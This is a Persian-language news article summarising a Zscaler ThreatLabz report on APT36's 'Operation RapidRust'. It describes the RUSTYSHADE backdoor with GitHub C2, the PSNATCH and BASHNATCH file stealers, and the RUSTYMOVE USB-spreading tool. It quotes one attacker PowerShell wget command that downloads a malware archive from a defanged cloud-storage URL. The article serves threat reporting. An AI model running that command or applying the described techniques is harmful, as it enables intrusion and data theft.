Zscaler ThreatLabz Operation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH

حمله APT36 با ابزارهای RUSTYSHADE و RUSTYMOVE

در آگوست ۲۰۲۶، گروه تهدید APT36 که به پاکستان مرتبط است، فعالیت‌های جدیدی را در کمپینی به نام Operation RapidRust آغاز کرد. این گروه به حملات خود علیه سازمان‌های دولتی و دفاعی در هند و افغانستان ادامه داده و تاکتیک‌ها، تکنیک‌ها و روش‌های خود را به‌روزرسانی کرده است. شرکت Zscaler ThreatLabz در تحقیقات خود ابزارهای بدافزار جدید و فعالیت‌های پس از نفوذ قابل توجهی را کشف کرده است. این ابزارهای جدید شامل درب پشتی RUSTYSHADE، ابزار پس از نفوذ RUSTYMOVE و ابزارهای سرقت فایل PSNATCH و BASHNATCH می‌باشند.

RUSTYSHADE

RUSTYSHADE یک درب پشتی جدید مبتنی بر زبان Rust است که برای ارتباطات فرمان و کنترل (C2) از مخازن خصوصی GitHub تحت کنترل مهاجم استفاده می‌کند و ارتباطات C2 را با استفاده از ⁦AES-256-GCM⁩ رمزگذاری می‌کند. این ابزار در سیستم‌های آلوده با استفاده از دستور زیر مستقر می‌شود:

powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip

RUSTYSHADE از API REST GitHub به عنوان کانال C2 استفاده می‌کند و پیام‌ها را با استفاده از ⁦AES-256-GCM⁩ رمزگذاری می‌کند. این ابزار از فایل‌های مشخصی در مخزن خصوصی GitHub برای همگام‌سازی ارتباطات استفاده می‌کند.

PSNATCH و BASHNATCH

PSNATCH یک ابزار سرقت فایل مبتنی بر PowerShell است که فایل‌ها را از ماشین‌های آلوده به مخازن خصوصی GitHub مهاجم منتقل می‌کند. این ابزار فایل‌هایی را که در ۱۲۰ روز گذشته تغییر کرده‌اند و دارای پسوندهای مشخصی هستند، جمع‌آوری می‌کند. BASHNATCH نسخه لینوکس این ابزار است که به همان شیوه عمل می‌کند.

RUSTYMOVE

RUSTYMOVE یک ابزار سبک‌وزن برای انتشار بدافزار از طریق رسانه‌های قابل جابجایی (مانند USB) است که فایل‌های مخرب از پیش آماده شده را به درایوهای خارجی متصل به سیستم‌های آلوده کپی می‌کند. این ابزار به عنوان یک مؤلفه حرکت جانبی عمل می‌کند و هیچ‌گونه قابلیت رمزگذاری یا ارتباط با زیرساخت‌های C2 مبتنی بر شبکه ندارد.

گروه APT36 با استفاده از این ابزارها و تکنیک‌ها سعی در نفوذ به شبکه‌های ایزوله و گسترش بدافزار خود دارد. برای مقابله با این تهدیدات، توصیه می‌شود که سازمان‌ها سیستم‌های خود را به‌روز نگه داشته و از ابزارهای امنیتی مناسب استفاده کنند.

منبع رسمی

مطالب مرتبط

The Hacker News JSCeal Malware Can Bypass Google Authentication Using Stolen Session Cookies
اخبار

بدافزار JSCeal با استفاده از کوکی‌های سرقتی احراز هویت گوگل را دور می‌زند

محققان امنیت سایبری JSCeal، بدافزار پیچیده جاوااسکریپت را بررسی کردند که با استفاده از کوکی‌های سرقتی، احراز هویت گوگل را دور می‌زند و قابلیت‌های نظارتی و رهگیری ترافیک دارد.

ادامه مطلب »

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

انتخاب مسیریاب

برای مسیریابی یکی از اپلیکیشن های زیر را انتخاب کنید.